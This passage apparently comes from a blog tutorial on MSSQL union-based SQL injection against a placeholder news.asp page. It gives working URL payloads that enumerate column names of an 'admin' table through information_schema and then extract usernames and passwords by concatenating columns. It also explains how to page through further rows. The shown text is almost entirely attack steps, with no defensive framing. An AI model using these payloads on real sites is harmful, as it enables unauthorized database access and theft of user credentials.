So let's execute this query to get the other tables in the database. Here is our second table in the database.



Now let's get the columns from the table. This is our query for the columns:

http://www.AnySite.com/news.asp?id=10 and 0=1 UNION SELECT 1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name=('admin')--+

After executing this query you can see the first column name.

This is the first column in that table. Let's get the other columns from it with this query:

http://www.AnySite.com/news.asp?id=10 and 0=1 UNION SELECT 1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name=('admin') and column_name not in ('emp_name')--+

In the not in list we add each previous column name to get the next one, exactly as we did for the tables, until we reach the column we want.

So let's execute this query to get the other columns. You can see the next column name printed there.

Now that we have the column names, let's extract data from them. As we cannot use group_concat in MSSQL, we join the two columns with the + string operator, URL-encoded as %2b because a literal + in a query string is decoded as a space, with a quoted separator between them. So our final query for extracting data from the columns is:

http://www.AnySite.com/news.asp?id=10 and 0=1 UNION SELECT 1,2,3,4,user_name%2b' '%2buser_pass,6,7,8,9,10,11,12,13,14,15 from admin--+

After executing the query you can see the username and password printed on the page. This returns one row; to get the others, exclude the usernames you have already seen with a not in list, as for tables and columns. Use the same procedure to extract data from other columns.

16 July, 2021

MSSQL Union Based Injection

(Earlier posting of the MSSQL Union Based Injection tutorial; the text is the same as the 24 March, 2022 post above.)